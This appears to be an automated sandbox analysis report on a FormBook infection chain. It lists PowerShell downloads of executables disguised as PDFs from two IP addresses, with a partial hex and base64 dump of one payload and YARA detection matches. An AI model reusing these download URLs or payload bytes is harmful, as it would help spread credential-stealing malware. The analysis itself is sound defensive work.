a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91
          Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:16:25 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:26:51 GMT ETag: "3aac-5dfeafb144fa1" Accept-Ranges: bytes Content-Length: 15020 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 43 34 51 4e 70 41 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 43 51 41 41 41 41 47 41 41 41 41 41 41 41 41 72 6b 49 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 47 41 41 41 41 41 41 41 41 41 41 43 67 41 41 41 41 41 67 41 41 41 41 41 41 41 41 4d 41 59 49 55 41 41 42 41 41 41 42 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 42 43 41 41 42 4c 41 41 41 41 41 47 41 41 41 4d 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 77 41 41 41 41 63 51 67 41 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 43 41 41 41 45 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 35 30 5a 58 68 30 41 41 41 41 74 43 49 41 41 41 41 67 41 41 41 41 4a 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 47 41 75 63 6e 4e 79 59 77 41 41 41 4d 41 44 41 41 41 41 59 41 41 41 41 41 51 41 41 41 41 6d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 42 41 4c 6e 4a 6c 62 47 39 6a 41 41 41 4d 41 41 41 41 41 49 41 41 41 41 41 43 41 41 41 41 4b 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 51 51 67 41 41 41 41 41 41 41 45 67 41 41 41 41 43 41 41 55 41 58 43 51 41 41 41 67 64 41 41 41 44 41 41 41 41 41 41 41 41 41 47 52 42 41 41 43 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 34 43 4b 41 45 41 41 41 6f 71 48 67 49 6f 41 67 41 41 43 69 71 6d 63 77 4d 41 41 41 71 41 41 51 41 41 42 48 4d 45 41 41 41 4b 67 41 49 41 41 41 52 7a 42 51 41 41 43 6f 41 44 41 41 41 45 63 77 59 41 41 41 71 41 42 41 41 41 42 43 6f 41 41 43 35 2b 41 51 41 41 42 47 38 48 41 41 41 4b 4b 69 35 2b 41 67 41 41 42 47 3
          Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:16:26 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:25:11 GMT ETag: "1a580-5dfeaf520524a" Accept-Ranges: bytes Content-Length: 107904 Content-Type: application/pdf Data Raw: e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91
          Yara detected Generic Downloader
          Source: Yara matchFile source: 6.2.powershell.exe.12fc82bf280.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.powershell.exe.12fe0190000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.powershell.exe.28251060000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.powershell.exe.282392fdd48.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: global trafficHTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
          Source: global trafficHTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
          Source: global trafficHTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.106.232.4
          Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.5
          Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.56.57.22
          Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.56.57.22/ts
          Source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.56.57.22/tsdfguhijk.txt
          Source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://2.56.57.22x
          Source: powershell.exe, 00000006.00000002.490800447.0000012FC8C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.483072450.0000012FC80F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.232.4
          Source: powershell.exe, 00000006.00000002.484659437.0000012FC8416000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.232.4/dll/26-05-2022-StartUp.pdf
          Source: powershell.exe, 00000006.00000002.483072450.0000012FC80F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.232.4/dll/26-05-2022-StartUp.pdfPk
          Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf
          Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.106.232.48
          Source: powershell.exe, 00000006.00000003.478394040.0000012FDFF82000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503288727.0000012FDFF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.6.
          Source: powershell.exe, 00000004.00000002.514247971.000001A563378000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503131093.0000012FDFF07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.492751855.000001C7C7233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: powershell.exe, 00000006.00000002.495224431.0000012FD7F45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000004.00000002.510984736.000001A54B2E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.480982102.0000012FC7EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.478703723.000001C7AF0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000006.00000002.495224431.0000012FD7F45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownDNS traffic detected: queries for: www.nancykmorrison.store
          Source: global trafficHTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
          Source: global trafficHTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
          Source: global trafficHTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.powershell.exe.12fc82bf280.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
          Source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
          Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.powershell.exe.12fe0190000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
          Source: 21.2.powershell.exe.28251060000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
          Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 21.2.powershell.exe.282392fdd48.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
          Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
          Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
